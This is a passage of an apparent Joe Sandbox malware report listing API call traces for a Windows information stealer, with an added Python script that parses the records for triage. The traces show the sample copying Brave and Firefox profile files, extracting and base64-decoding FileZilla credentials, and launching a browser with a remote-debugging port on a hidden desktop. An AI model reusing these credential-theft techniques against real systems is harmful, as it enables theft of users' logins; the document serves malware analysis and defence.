                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDBE4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006DDBEF
                            • lstrlen.KERNEL32(00704CA8), ref: 006DDBFA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDC17
                            • lstrcat.KERNEL32(00000000,00704CA8), ref: 006DDC23
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDC4C
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006DDC8F
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006DDCBF
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 006DDCD0
                            • StrCmpCA.SHLWAPI(?,007017A0), ref: 006DDCF0
                            • StrCmpCA.SHLWAPI(?,007017A4), ref: 006DDD0A
                            • lstrlen.KERNEL32(006FCFEC), ref: 006DDD1D
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006DDD47
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDD70
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006DDD7B
                            • lstrlen.KERNEL32(00701794), ref: 006DDD86
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDDA3
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006DDDAF
                            • lstrlen.KERNEL32(?), ref: 006DDDBC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDDDF
                            • lstrcat.KERNEL32(00000000,?), ref: 006DDDED
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDE19
                            • lstrlen.KERNEL32(00701794), ref: 006DDE3D
                            • lstrcpy.KERNEL32(00000000,?), ref: 006DDE6F
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006DDE7B
                            • lstrlen.KERNEL32(01018B48), ref: 006DDE8A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDEB0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006DDEBB
                            • lstrlen.KERNEL32(00701794), ref: 006DDEC6
                            • lstrcpy.KERNEL32(00000000,?), ref: 006DDEE6
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006DDEF2
                            • lstrlen.KERNEL32(01018928), ref: 006DDF01
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDF27
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006DDF32
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDF5E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDFA5
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006DDFB1
                            • lstrlen.KERNEL32(01018B48), ref: 006DDFC0
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDFE9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006DDFF4
                            • lstrlen.KERNEL32(00701794), ref: 006DDFFF
                            • lstrcpy.KERNEL32(00000000,?), ref: 006DE022
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006DE02E
                            • lstrlen.KERNEL32(01018928), ref: 006DE03D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DE063
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006DE06E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DE09A
                            • StrCmpCA.SHLWAPI(?,Brave), ref: 006DE0CD
                            • StrCmpCA.SHLWAPI(?,Preferences), ref: 006DE0E7
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006DE11F
                            • lstrlen.KERNEL32(0101DE28), ref: 006DE12E
                            • lstrcpy.KERNEL32(00000000,?), ref: 006DE155
                            • lstrcat.KERNEL32(00000000,?), ref: 006DE15D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DE19F
                            • lstrcat.KERNEL32(00000000), ref: 006DE1A9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DE1D0
                            • CopyFileA.KERNEL32(00000000,?,00000001), ref: 006DE1F9
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006DE22F
                            • lstrlen.KERNEL32(010188F8), ref: 006DE23D
                            • lstrcpy.KERNEL32(00000000,?), ref: 006DE261
                            • lstrcat.KERNEL32(00000000,010188F8), ref: 006DE269
                            • FindNextFileA.KERNEL32(00000000,?), ref: 006DE988
                            • FindClose.KERNEL32(00000000), ref: 006DE997
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                            • String ID: Brave$Preferences$\Brave\Preferences
                            • API String ID: 1346089424-1230934161
                            • Opcode ID: 01f8d51664ee83de9e2e895582338ecbbf483c73eb7128448a88c4abd1753466
                            • Instruction ID: 3b6cd5da72f71b81974e4b6434e6d4efe66169726693fcf10d9e466b1f5eae49
                            • Opcode Fuzzy Hash: 01f8d51664ee83de9e2e895582338ecbbf483c73eb7128448a88c4abd1753466
                            • Instruction Fuzzy Hash: 9D527CB0E2521A9FDB61AF75DC99AAE77BAAF54300F04412AF846DB351DB34DC018B90
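Three of the records above are the same directory walk (FindFirstFileA on a "%s\*.*" pattern, StrCmpCA against two fixed strings, lstrcpy/lstrcat path building, FindNextFileA/FindClose), and the Brave one adds a CopyFileA of the Preferences file it finds. Reading that out of hundreds of bullet lines by eye is slow, so the script below is an added example (not Joe Sandbox code and not the sample's code) that parses records in exactly this layout: it collects each function's call sites, the "String ID" and "API ID" fields, and the dump's "Offset:" so call-site addresses can be turned into image-relative offsets for use in a rebased IDA database. The behaviour tags in triage() are my own heuristics and use only what a record lists. SAMPLE is a constructed excerpt assembled from lines of the records above.

```python
"""Parse the per-function records Joe Sandbox's IDA plugin writes into this
report (the APIs / Memory Dump Source / Similarity blocks) and reduce each to
an API profile, referenced strings, coarse tags and image-relative offsets.
Added example for this page: not Joe Sandbox code and not the sample's code.
SAMPLE is a constructed excerpt assembled from records above."""
import re
from collections import Counter
from dataclasses import dataclass, field

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
            "Yara matches", "Similarity"}
# matches "lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E1947" and the
# argument-less form "wsprintfA.USER32 ref: 006E392C"
API_RE = re.compile(r"^(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?"
                    r"\s*ref:\s*(?P<ref>[0-9A-Fa-f]{6,8})$")
OFFSET_RE = re.compile(r"Offset:\s*([0-9A-Fa-f]{6,8})")


@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)    # (api, module, [args], ref)
    strings: list = field(default_factory=list)  # "String ID" split on '$'
    api_id: str = ""
    image_base: int = 0                          # "Offset:" of the source dump

    def api_profile(self) -> Counter:
        return Counter(api for api, _, _, _ in self.calls)

    def rva(self, ref: int) -> int:
        """Image-relative offset of a call site; stable across rebased dumps."""
        return ref - self.image_base

    def triage(self) -> set:
        """Behaviour tags justified only by what the record itself shows."""
        apis = {api for api, _, _, _ in self.calls}
        tags = set()
        if {"FindFirstFileA", "FindNextFileA"} <= apis:
            tags.add("directory-walk")
        if "CopyFileA" in apis:
            tags.add("file-copy")
        if any(mod == "WININET" for _, mod, _, _ in self.calls):
            tags.add("network")
        if any("\\AppData\\" in s for s in self.strings):
            tags.add("user-profile-path")
        return tags


def parse_records(text: str) -> list:
    records, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":                  # every record opens with this header
            cur, section = FunctionRecord(), "APIs"
            records.append(cur)
        elif line in SECTIONS:
            section = line
        elif cur is not None and line.startswith("•"):
            body = line[1:].strip()
            if section == "APIs" and (m := API_RE.match(body)):
                args = m["args"].split(",") if m["args"] is not None else []
                cur.calls.append((m["api"], m["module"], args, int(m["ref"], 16)))
            elif section == "Memory Dump Source" and body.startswith("Source File:"):
                if m := OFFSET_RE.search(body):
                    cur.image_base = int(m.group(1), 16)
            elif section == "Similarity":
                key, _, val = body.partition(":")
                if key.strip() == "String ID":
                    cur.strings = val.strip().split("$")
                elif key.strip() == "API ID":
                    cur.api_id = val.strip()
    return records


SAMPLE = r"""
APIs
• wsprintfA.USER32 ref: 006E392C
• FindFirstFileA.KERNEL32(?,?), ref: 006E3943
• FindNextFileA.KERNEL32(00000000,?), ref: 006E42D9
• FindClose.KERNEL32(00000000), ref: 006E42E8
Strings
Memory Dump Source
• Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
Similarity
• API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
• String ID: %s\*.*
APIs
• lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006DDBC1
• FindFirstFileA.KERNEL32(00000000,?), ref: 006DDCD0
• StrCmpCA.SHLWAPI(?,Brave), ref: 006DE0CD
• CopyFileA.KERNEL32(00000000,?,00000001), ref: 006DE1F9
• FindNextFileA.KERNEL32(00000000,?), ref: 006DE988
Memory Dump Source
• Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
Similarity
• API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
• String ID: Brave$Preferences$\Brave\Preferences
"""

if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        first = rec.calls[0][3] if rec.calls else 0
        print(hex(rec.rva(first)), sorted(rec.triage()), rec.api_profile().most_common(3))
```

Feed it the text of the whole report section and group records by triage() tags: every "directory-walk" plus "file-copy" record is a candidate browser or client profile harvester, and the rva() values give offsets you can jump to in an IDA database opened on the dumped image regardless of where the sample was mapped.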
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D60FF
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006D6152
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006D6185
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006D61B5
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006D61F0
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006D6223
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 006D6233
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$InternetOpen
                            • String ID: "$------
                            • API String ID: 2041821634-2370822465
                            • Opcode ID: 32ac470c948c9311755246b20cbbdc70cb2ea35d7f05cfbc2f81db47cf3ebe3f
                            • Instruction ID: 45e97b445087c7711615f06e8bd1687b94507b9f3ce460c35eb9964845c876b8
                            • Opcode Fuzzy Hash: 32ac470c948c9311755246b20cbbdc70cb2ea35d7f05cfbc2f81db47cf3ebe3f
                            • Instruction Fuzzy Hash: 84526C71E1421A9FDB61EFB5DC59BAE77BAAF14300F08802AF905AB351DB34DD018B94
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E6B9D
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E6BCD
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E6BFD
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E6C2F
                            • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 006E6C3C
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006E6C43
                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 006E6C5A
                            • lstrlen.KERNEL32(00000000), ref: 006E6C65
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E6CA8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E6CCF
                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 006E6CE2
                            • lstrlen.KERNEL32(00000000), ref: 006E6CED
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E6D30
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E6D57
                            • StrStrA.SHLWAPI(00000000,<User>), ref: 006E6D6A
                            • lstrlen.KERNEL32(00000000), ref: 006E6D75
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E6DB8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E6DDF
                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 006E6DF2
                            • lstrlen.KERNEL32(00000000), ref: 006E6E01
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E6E49
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E6E71
                            • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 006E6E94
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 006E6EA8
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 006E6EC9
                            • LocalFree.KERNEL32(00000000), ref: 006E6ED4
                            • lstrlen.KERNEL32(?), ref: 006E6F6E
                            • lstrlen.KERNEL32(?), ref: 006E6F81
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                            • API String ID: 2641759534-2314656281
                            • Opcode ID: d1c81867631a9da00461bf2a116621144cd62a860cb23134f17ef8739d6ac984
                            • Instruction ID: db7c6c65bc328c192c93e04929cff8a8597d352e7673458713f8f67f6e683959
                            • Opcode Fuzzy Hash: d1c81867631a9da00461bf2a116621144cd62a860cb23134f17ef8739d6ac984
                            • Instruction Fuzzy Hash: 4702D3B0E26356AFCB20ABB6DC59BAE7BBAEF14740F144419F902D7352DB34D8018790
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E4B51
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E4B74
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E4B7F
                            • lstrlen.KERNEL32(00704CA8), ref: 006E4B8A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E4BA7
                            • lstrcat.KERNEL32(00000000,00704CA8), ref: 006E4BB3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E4BDE
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 006E4BFA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID: prefs.js
                            • API String ID: 2567437900-3783873740
                            • Opcode ID: c431fcf159d2fe28b2bab904fdc75f1af346027849f354a646be1d5959e14be3
                            • Instruction ID: 1217c6ac2f30a397ce450ce01755cbe1b1504f3c86796e7549b52620814beb32
                            • Opcode Fuzzy Hash: c431fcf159d2fe28b2bab904fdc75f1af346027849f354a646be1d5959e14be3
                            • Instruction Fuzzy Hash: 60924370A167428FDB64CF2AC958B99B7F6BF44318F19806DE40A9B3A2DB71DC41CB50
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E1291
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E12B4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E12BF
                            • lstrlen.KERNEL32(00704CA8), ref: 006E12CA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E12E7
                            • lstrcat.KERNEL32(00000000,00704CA8), ref: 006E12F3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E131E
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 006E133A
                            • StrCmpCA.SHLWAPI(?,007017A0), ref: 006E135C
                            • StrCmpCA.SHLWAPI(?,007017A4), ref: 006E1376
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E13AF
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E13D7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E13E2
                            • lstrlen.KERNEL32(00701794), ref: 006E13ED
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E140A
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006E1416
                            • lstrlen.KERNEL32(?), ref: 006E1423
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1443
                            • lstrcat.KERNEL32(00000000,?), ref: 006E1451
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E147A
                            • StrCmpCA.SHLWAPI(?,0101DE70), ref: 006E14A3
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E14E4
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E150D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1535
                            • StrCmpCA.SHLWAPI(?,0101E798), ref: 006E1552
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E1593
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E15BC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E15E4
                            • StrCmpCA.SHLWAPI(?,0101DD98), ref: 006E1602
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1633
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E165C
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E1685
                            • StrCmpCA.SHLWAPI(?,0101DDE0), ref: 006E16B3
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E16F4
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E171D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1745
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E1796
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E17BE
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E17F5
                            • FindNextFileA.KERNEL32(00000000,?), ref: 006E181C
                            • FindClose.KERNEL32(00000000), ref: 006E182B
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                            • String ID:
                            • API String ID: 1346933759-0
                            • Opcode ID: e0e5f2654a96ed80d6d995f8d854e5a4c5d6685d502be0e0247ed01a4c1f0131
                            • Instruction ID: ee539c55e8418336389d62693da98697477bb3825a1ce75be74524680d23922e
                            • Opcode Fuzzy Hash: e0e5f2654a96ed80d6d995f8d854e5a4c5d6685d502be0e0247ed01a4c1f0131
                            • Instruction Fuzzy Hash: DB12A0B0A123469FCB60EF7ADC99AAE77BAAF45300F04452DB846DB351DB34DC419B90
                            APIs
                            • wsprintfA.USER32 ref: 006ECBFC
                            • FindFirstFileA.KERNEL32(?,?), ref: 006ECC13
                            • lstrcat.KERNEL32(?,?), ref: 006ECC5F
                            • StrCmpCA.SHLWAPI(?,007017A0), ref: 006ECC71
                            • StrCmpCA.SHLWAPI(?,007017A4), ref: 006ECC8B
                            • wsprintfA.USER32 ref: 006ECCB0
                            • PathMatchSpecA.SHLWAPI(?,01018A78), ref: 006ECCE2
                            • CoInitialize.OLE32(00000000), ref: 006ECCEE
                              • Part of subcall function 006ECAE0: CoCreateInstance.COMBASE(006FB110,00000000,00000001,006FB100,?), ref: 006ECB06
                              • Part of subcall function 006ECAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 006ECB46
                              • Part of subcall function 006ECAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 006ECBC9
                            • CoUninitialize.COMBASE ref: 006ECD09
                            • lstrcat.KERNEL32(?,?), ref: 006ECD2E
                            • lstrlen.KERNEL32(?), ref: 006ECD3B
                            • StrCmpCA.SHLWAPI(?,006FCFEC), ref: 006ECD55
                            • wsprintfA.USER32 ref: 006ECD7D
                            • wsprintfA.USER32 ref: 006ECD9C
                            • PathMatchSpecA.SHLWAPI(?,?), ref: 006ECDB0
                            • wsprintfA.USER32 ref: 006ECDD8
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 006ECDF1
                            • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 006ECE10
                            • GetFileSizeEx.KERNEL32(00000000,?), ref: 006ECE28
                            • CloseHandle.KERNEL32(00000000), ref: 006ECE33
                            • CloseHandle.KERNEL32(00000000), ref: 006ECE3F
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006ECE54
                            • lstrcpy.KERNEL32(00000000,?), ref: 006ECE94
                            • FindNextFileA.KERNEL32(?,?), ref: 006ECF8D
                            • FindClose.KERNEL32(?), ref: 006ECF9F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                            • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                            • API String ID: 3860919712-2388001722
                            • Opcode ID: 6916119dc478e14d3a06367d878fb7740b20b397732d12d332e5f729f93ba98b
                            • Instruction ID: 1afe4b4bf0826ed40cc5761f5cebd4e46565356d7b2ffc60f745c5773ba0359b
                            • Opcode Fuzzy Hash: 6916119dc478e14d3a06367d878fb7740b20b397732d12d332e5f729f93ba98b
                            • Instruction Fuzzy Hash: A2C180B1A10359AFDB60DF65DC49EEE77BAFF44300F044599F609A7290EA30AA45CF90
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E1291
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E12B4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E12BF
                            • lstrlen.KERNEL32(00704CA8), ref: 006E12CA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E12E7
                            • lstrcat.KERNEL32(00000000,00704CA8), ref: 006E12F3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E131E
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 006E133A
                            • StrCmpCA.SHLWAPI(?,007017A0), ref: 006E135C
                            • StrCmpCA.SHLWAPI(?,007017A4), ref: 006E1376
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E13AF
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E13D7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E13E2
                            • lstrlen.KERNEL32(00701794), ref: 006E13ED
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E140A
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006E1416
                            • lstrlen.KERNEL32(?), ref: 006E1423
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1443
                            • lstrcat.KERNEL32(00000000,?), ref: 006E1451
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E147A
                            • StrCmpCA.SHLWAPI(?,0101DE70), ref: 006E14A3
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E14E4
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E150D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1535
                            • StrCmpCA.SHLWAPI(?,0101E798), ref: 006E1552
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E1593
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E15BC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E15E4
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E1796
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E17BE
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E17F5
                            • FindNextFileA.KERNEL32(00000000,?), ref: 006E181C
                            • FindClose.KERNEL32(00000000), ref: 006E182B
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                            • String ID:
                            • API String ID: 1346933759-0
                            • Opcode ID: 5298e4d97aa6324298e25bece5b85ed8d0f98e41932f6ede3e9aa9c8c745867a
                            • Instruction ID: e22e176d838fec2d831591ae28673884b8cd7ab6f747824b51962b2f90307b74
                            • Opcode Fuzzy Hash: 5298e4d97aa6324298e25bece5b85ed8d0f98e41932f6ede3e9aa9c8c745867a
                            • Instruction Fuzzy Hash: 41C1CEB1A123169FCB61EF76DC99AEE77BAAF11300F044129F84A9B351DB30DD419B90
                            APIs
                            • memset.MSVCRT ref: 006D9790
                            • lstrcat.KERNEL32(?,?), ref: 006D97A0
                            • lstrcat.KERNEL32(?,?), ref: 006D97B1
                            • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 006D97C3
                            • memset.MSVCRT ref: 006D97D7
                              • Part of subcall function 006F3E70: lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006F3EA5
                              • Part of subcall function 006F3E70: lstrcpy.KERNEL32(00000000,0101EAC0), ref: 006F3ECF
                              • Part of subcall function 006F3E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,006D134E,?,0000001A), ref: 006F3ED9
                            • wsprintfA.USER32 ref: 006D9806
                            • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 006D9827
                            • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 006D9844
                              • Part of subcall function 006F46A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 006F46B9
